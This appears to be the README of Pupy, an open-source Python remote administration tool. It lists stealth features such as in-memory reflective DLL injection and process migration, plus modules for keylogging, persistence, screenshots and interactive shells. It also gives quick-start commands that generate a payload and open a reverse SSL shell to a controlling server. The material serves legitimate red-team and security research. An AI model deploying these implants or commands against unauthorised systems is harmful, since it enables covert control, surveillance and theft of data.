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# Pupy
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Pupy is an opensource RAT (Remote Administration Tool) written in Python. Pupy uses reflective dll injection and leaves no traces on disk.
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## Features :
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- On windows, the Pupy payload is compiled as a reflective DLL and the whole python interpreter is loaded from memory. Pupy does not touch the disk :)
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- Pupy can reflectively migrate into other processes
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- Pupy can remotely import, from memory, pure python packages (.py, .pyc) and compiled python C extensions (.pyd). The imported python modules do not touch the disk. (.pyd mem import currently work on Windows only, .so memory import is not implemented).
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- modules are quite simple to write and pupy is easily extensible.
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- Pupy uses rpyc (https://github.com/tomerfiliba/rpyc) and a module can directly access python objects on the remote client
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- we can also access remote objects interactively from the pupy shell and even auto completion of remote attributes works !
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- communication channel currently works as a ssl reverse connection, but a bind payload will be implemented in the future
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- all the non interactive modules can be dispatched on multiple hosts in one command
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- Multi-platform (tested on windows 7, windows xp, kali linux, ubuntu)
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- modules can be executed as background jobs
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- commands and scripts running on remote hosts are interruptible
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- auto-completion and nice colored output :-)
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- commands aliases can be defined in the config
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## Implemented Modules :
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- migrate (windows only)
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- inter process architecture injection also works (x86->x64 and x64->x86)
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- keylogger (windows only)
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- persistence (windows only)
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- screenshot (windows only)
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- command execution
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- download
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- upload
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- socks5 proxy
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- interactive shell (cmd.exe, /bin/sh, ...)
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- interactive python shell
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##Quick start
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In these examples the server is running on a linux host (tested on kali linux) and it's IP address is 192.168.0.1
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The clients have been tested on (Windows 7, Windows XP, kali linux, ubuntu, Mac OS X 10.10.5)
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### generate/run a payload
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#### for Windows
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```bash
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./genpayload.py 192.168.0.1 -p 443 -t exe_x86 -o pupyx86.exe
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```
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#### for Linux
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```bash
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pip install rpyc #(or manually copy it if you are not admin)
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python reverse_ssl.py 192.168.0.1:443
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```
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#### for MAC OS X
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```bash
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easy_install rpyc #(or manually copy it if you are not admin)
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python reverse_ssl.py 192.168.0.1:443
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```
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### having fun
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1. eventually edit pupy.conf to change the bind address / port
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2. start the pupy server :
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```bash
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./pupysh.py
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```
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3. type "clients" to display connected clients
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### Some screenshots
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#####list connected clients
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![screenshot1](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/scr1.png "screenshot1")
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#####help
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![screenshot3](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/help.png "screenshot3")
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#####execute python code on all clients
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![screenshot2](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/scr2.png "screenshot2")
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#####execute a command on all clients, exception is retrieved in case the command does not exists
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![screenshot4](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/scr3.png "screenshot4")
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#####use a filter to send a module only on selected clients
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![screenshot5](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/filters.png "screenshot5")
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#####migrate into another process
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![screenshot6](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/migrate.png "screenshot6")
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## Dependencies
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rpyc (https://github.com/tomerfiliba/rpyc)
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## Contact
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Don't hesitate to send me your feedback or any issue you may find
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mail: contact@n1nj4.eu
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[Follow me on twitter](https://twitter.com/n1nj4sec)
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